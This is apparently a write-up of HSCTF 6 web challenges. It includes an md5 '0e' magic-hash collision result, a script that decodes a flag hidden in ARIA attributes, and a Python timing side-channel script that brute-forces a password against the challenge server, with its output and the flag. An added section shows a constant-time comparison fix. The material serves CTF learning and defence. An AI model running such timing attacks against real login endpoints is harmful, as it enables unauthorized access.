HSCTF 6 — Web Challenges

1. Inspect Me

2. Agent Keith

3. S-Q-L

4. The Quest

5. Keith Logger

6. md5

[+] found! md5( 0e251288019 ) ---> 0e874956163641961271069404332409
[+] in 251288020 iterations

7. Accessible Rich Internet Applications

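from bs4 import BeautifulSoup

# Script 1: count the <div role="option"> elements in the saved page.
with open("index.html") as tx:
    soup = BeautifulSoup(tx, "html.parser")

dig = []

for item in soup.find_all('div', {'role': "option"}):
    dig.append(int(item['aria-posinset']))

print(len(dig))

from bs4 import BeautifulSoup

# Script 2: read the divs in aria-posinset order, each holding one bit,
# and decode every group of 8 bits as an ASCII character.
def binary2ascii(s):
    return ''.join(chr(int(s[i*8:i*8+8], 2)) for i in range(len(s)//8))

with open("index.html") as tx:
    soup = BeautifulSoup(tx, "html.parser")

a = 0
flag = []

for i in range(0, 1040):
    flag.append(soup.find('div', {'aria-posinset': str(i)}).contents[0])
    a += 1
    if a % 8 == 0:
        # A full byte has been collected: print it and start the next one.
        print(binary2ascii("".join(flag)), end='')
        flag.clear()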

8. Networked Password

import requests
import string

link = 'https://networked-password.web.chal.hsctf.com'
charset = string.ascii_letters + string.digits + string.punctuation
# print(charset)
flag = "hsctf{"
resp = 0
char = ""

# Extend the known prefix one character at a time until the closing brace.
while flag[-1] != "}":
    for i in charset:
        payload = {"password": flag + i}
        r = requests.post(link, data=payload)
        # Keep the candidate that produced the slowest response.
        if r.elapsed.total_seconds() > resp:
            resp = r.elapsed.total_seconds()
            char = i
    flag += char
    resp = 0
    print("[+] Current Flag: " + flag)

[+] Flag: hsctf{s
[+] Flag: hsctf{sm
[+] Flag: hsctf{sm0
[+] Flag: hsctf{sm0l
[+] Flag: hsctf{sm0l_
[+] Flag: hsctf{sm0l_f
[+] Flag: hsctf{sm0l_fl
[+] Flag: hsctf{sm0l_fl4
[+] Flag: hsctf{sm0l_fl4g
[+] Flag: hsctf{sm0l_fl4g}
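
The script above treats the slowest response as the correct guess, which only works when the server's check spends more time for each matching leading character. The following is an added example, not code from the challenge or the original post: it models such a check beside a comparison that does not depend on the guess. The secret value, the function names and the "matched characters" counter standing in for response time are assumptions, since the challenge's server code is not shown on this page.

```python
import hashlib
import hmac

SECRET = "hsctf{constructed_example}"  # constructed value, not the challenge flag


def leaky_check(guess, secret=SECRET):
    """Position-dependent comparison (assumed model of the flawed check).

    Returns (ok, matched); `matched` stands in for the response time,
    which grows by one unit per matching leading character.
    """
    matched = 0
    for g, s in zip(guess, secret):
        if g != s:
            return False, matched      # stops at the first mismatch
        matched += 1                   # extra work for every correct character
    return len(guess) == len(secret), matched


def constant_time_check(guess, secret=SECRET):
    """Hardened comparison: no early exit, and no length leak.

    Hashing both sides first gives compare_digest equal-length inputs,
    so neither the mismatch position nor the secret's length shows up
    in the time taken.
    """
    a = hashlib.sha256(guess.encode()).digest()
    b = hashlib.sha256(secret.encode()).digest()
    return hmac.compare_digest(a, b)


def steps_profile(prefix, candidates):
    """Work done by leaky_check for each one-character extension of prefix."""
    return {c: leaky_check(prefix + c)[1] for c in candidates}


if __name__ == "__main__":
    # The correct next character ('c') stands out in the leaky profile.
    print(steps_profile("hsctf{", "abc"))
    # The hardened check returns only a boolean, with no per-character work.
    print(constant_time_check("hsctf{c"), constant_time_check(SECRET))
```

Replacing the comparison removes the per-character signal; rate limiting or lockout on repeated failed guesses is a separate control and is not modelled here.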

Kamran Saifullah
